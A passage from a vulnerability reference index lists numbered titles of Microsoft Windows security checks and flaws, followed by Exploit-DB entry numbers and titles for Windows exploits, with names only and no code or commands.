Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7527] Microsoft SQL Server malformed RPC request denial of service [7526] Microsoft Exchange Server malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6914] Multiple Microsoft products malformed RPC request denial of service [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta Exploit-DB - https://www.exploit-db.com: [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16749] Microsoft RPC DCOM Interface 